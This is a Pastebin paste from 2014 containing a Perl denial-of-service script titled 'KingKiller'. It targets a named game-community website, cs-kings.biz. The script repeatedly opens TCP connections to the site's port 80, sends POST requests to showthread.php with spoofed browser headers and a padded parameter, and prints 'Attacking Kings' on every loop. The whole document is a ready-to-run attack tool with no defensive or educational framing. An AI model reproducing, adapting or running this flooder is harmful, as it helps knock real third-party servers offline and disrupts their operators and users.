Advertisement
Guest User

cs-kings.biz DOS - KingKiller

a guest
Mar 18th, 2014
175
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.46 KB | None | 0 0
  1. # cs-kings.biz DOS - KingKiller
  2. #!/usr/bin/perl
  3.  
  4. use IO::Socket;
  5.  
  6. print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
  7. print "+ cs-kings.biz killer +\n";
  8. print "+ Coded by Anonymous +\n";
  9. print "+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
  10. $host = "cs-kings.biz";
  11. $pth = "/";
  12. {
  13. while($x != 999999)
  14. {
  15. $postit = "?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
  16. $lrg = length $postit;
  17. my $sock = new IO::Socket::INET (
  18. PeerAddr => "$host",
  19. PeerPort => "80",
  20. Proto => "tcp",
  21. );
  22. die "\nOffline! - We can not Connect To '$host' its already down\n" unless $sock;
  23.  
  24. print $sock "POST $pth/showthread.php HTTP/1.1\n";
  25. print $sock "Host: $host\n";
  26. print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
  27. print $sock "Referer: $host\n";
  28. print $sock "Accept-Language: en-us\n";
  29. print $sock "Content-Type: application/x-www-form-urlencoded\n";
  30. print $sock "Accept-Encoding: gzip, deflate\n";
  31. print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
  32. print $sock "Connection: Keep-Alive\n";
  33. print $sock "Cache-Control: no-cache\n";
  34. print $sock "Content-Length: $lrg\n\n";
  35. print $sock "$postit\n";
  36. close($sock);
  37. syswrite STDOUT, "Attacking Kings ";
  38. $x++;
  39. }
  40. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement